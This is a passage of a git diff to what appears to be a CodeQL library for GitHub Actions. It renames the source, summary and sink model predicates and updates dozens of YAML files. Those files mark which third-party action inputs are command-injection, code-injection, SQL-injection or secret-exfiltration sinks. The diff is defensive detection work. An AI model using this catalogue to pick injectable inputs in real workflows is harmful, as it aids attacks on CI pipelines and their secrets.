input, string kind, string provenance) { - Extensions::sinkModel(action, version, input, kind, provenance) +predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::actionsSinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind, _) and + actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -113,7 +113,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint", _) and + actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -135,7 +135,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind, _) and + actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 6c64b72e6b4..05f71cfc0be 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,21 +5,21 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( +extensible predicate actionsSourceModel( string action, string version, string output, string kind, string provenance ); /** * Holds if a summary model exists for the given parameters. */ -extensible predicate summaryModel( +extensible predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel( +extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index 67455900ec3..b897e8f2c5a 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 0220f0d54d8..3a5b34880b9 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 9b36680af8f..20abd532872 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index fe3c3e58b5f..dcc20433483 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 41b67c2a625..3afd9991e07 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 4d12a293696..3deae2a9f19 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7cb2e10e926..7dd0459ab7f 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 83f09bc6bde..721042aafaf 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index bdd8a8f77c9..ee4dbaf2b55 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 7e5f5c9ee6a..76ae920d255 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 8daa9a9c2b3..46f667d75a0 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 80502e487b8..4df6fe61a43 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 2a26d31feac..aab329160ea 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 82e81f55816..610d188f065 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index 58554eb3f61..b571bded8ca 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index ca99210b4c2..cd8f4f73e49 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 1563d95b0b1..6ebc3875e07 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2bb6000355d..2b2dbd014b7 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index b0c3419abe9..78b7eb1394c 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index cbe593690e4..0f146da2e0c 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index f29355d4882..483a3bf5172 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 8463ed9577b..e06e75f7a3b 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index f20a877c3d2..d0a88ff3167 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index e0fe96ff915..a29f84a55b5 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index a7489b68688..0e11fe45b42 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index c0a18c36465..7e0970034a5 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 79ed7a80437..2f62f211da9 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 550b5b854ed..f94ad242321 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index bbe88611259..5872399881c 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 83b3bc3520d..02c5dcd3cca 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 3b0642fece4..45bf0c57355 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index db55d3c6f3a..4ac3492c41c 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a4539923b35..a48da0cedfc 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 46226863687..6ca7aa86c06 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index afe3e82ca1f..11f1f10980f 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 5b0a9dab38d..9ed2cb7908b 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 35bbd72f0a4..7f279f37a45 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 472778d33b4..68f434f4797 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 1647e560730..890a47c79fc 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index bbdad8287dd..aff5c330316 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index f3ac66006d9..8f5e22fa2d9 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 9189245e228..ff0131da99e 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index bd64fc37423..1d82fb8f836 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 9a20279e110..1e4cc21dd13 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 8d06bc8a512..ba729868a04 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 9d066ac23ec..504f0693977 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 71d83774231..48267b6d082 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 563da9d4c0f..26eea1d2341 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 5194ce500fb..7993d827fa6 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 8c2f32627d9..de48ea5a709 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index f74ae81a52c..36a9b24f089 100644 --- 